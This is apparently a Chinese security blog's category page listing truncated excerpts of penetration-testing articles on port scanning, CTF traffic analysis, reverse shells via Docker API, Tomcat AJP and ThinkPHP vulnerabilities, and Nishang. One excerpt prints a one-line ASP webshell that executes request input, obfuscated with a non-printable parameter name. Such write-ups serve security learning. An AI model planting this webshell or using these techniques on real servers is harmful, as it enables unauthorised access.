分类 web安全 下的文章

我们在进行渗透测试中,一般情况下会对端口进行扫描,看看服务器中开启了哪些端口,对应的端口一般存在对应的服务,而这些服务可能存在相应的漏洞,下面就是简单结束一下端口对应服务,服务可能对应的漏洞。端口渗透图解详解端口渗透文件共享端口渗透FTP服务FTP服务:ftp服务我分为两种情况,第一种是使用系统软件来配置,比如IIS中的FTP文件共享或Linux中的默认服务软件;第二种是通过第三方软.......

前言题目地址:https://www.mozhe.cn/bug/detail/NDU3RnFGTitFdUlaOXNlNFp6QzUydz09bW96aGUmozhe背景介绍:某公司安全工程师抓取到一段Wireshark数据包,发现有人删除了数据库中的登录记录,找到攻击者境内的IP地址。使用工具:WireSharkWireShark流量分析首先打开 23.pcapng 这个流量数据包.......

0x00 前言今天测试docker remote api未授权访问漏洞的时候,在ubuntu上使用bash反弹shell,一直不成功。查看/var/log/syslog图中圈出来的内容,表示执行该定时任务的时候报错,报错信息无法输出所以很惊讶为什么不能够成功,不管是/etc/crontab还是/var/spool/cron/crontabs/所以有了下面的内容测试环境:ubuntu .......

什么是域名系统(DNS)?域名系统是用于在线资源(例如计算机和其他服务)的分散式命名系统。DNS将域名转换为IP地址,从而使用户无需记住一长串数字即可在连接到Internet时访问网站和服务。例如,您当前正在访问的站点的IP地址为“ 104.27.166.50”。尽管有些人可能会记住这么长的数字字符串(并且您知道自己是谁),但记住键入“ pixelprivacy.com”访问我的网站.......

今天无意看到一个asp的shell是这样的,09转ascii肯定是不可显示的字符。那应该如何用菜刀连接?<% heheda=Request(Chr(35)&chr(37)&chr(09)) execute heheda %> 0x01. 原理思路其实很简单,由于菜刀的密码框里肯定不能输入不可显示的字符,那么我们将这些字符用%写到我们的脚本上,再POST到t.......

0x01 简介Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。0x02 漏洞概述由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。0x03 影响.......

0x1. windowswindows上的文件名长度和文件路径有关具体关系为:从根目录计算,文件路径长度最长为259个bytes。有一个特殊情况,D:xx.txt,类似这样根目录下面一个文件,最后该文件路径长度最长为258个bytes,其他都是259个bytes这也是为什么msdn定义#define MAX_PATH 260的原因,第260个字符为字符串结尾的0具体操作可以在任意一个.......

Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。包括了下载和执行、键盘记录、dns、延时命令等脚本。今天要给大家介绍的是如何通过powershell对目标的屏幕进行实时监控。脚本下载地址如下:https://raw.githubusercontent.c.......

导语当网站架设一个带有云盾防护的cdn,无疑是对我们的web渗透造成了极大的困扰,当你的web一把梭失效之后,更多时候会让你对你的渗透目标进入苦思冥想的状态。cdn概念内容分发网络(英语:Content Delivery Network或Content Distribution Network,缩写:CDN)。内容分发网络节点会在多个地点,多个不同的网络上摆放。这些节点之间会动态的互.......

目录:查找隐藏文件如何设置隐藏attrib命令0x01.查找隐藏文件dir /ah /ah表示all hidden,只显示所有隐藏的文件和目录。dir /a 显示所有文件和目录,包括隐藏文件。attrib设置文件夹选项为:可以查看隐藏文件0x02. 如何设置隐藏只需要用windows上attrib命令attrib +h xx.file 设置文件隐藏属性(hide)attrib -h .......

0x00:漏洞描述2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞.该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell. 0x01:影响范围ThinkPHP6.0.0-6.0.1 0x02:环境准备1、/tp60/app/middleware.ph.......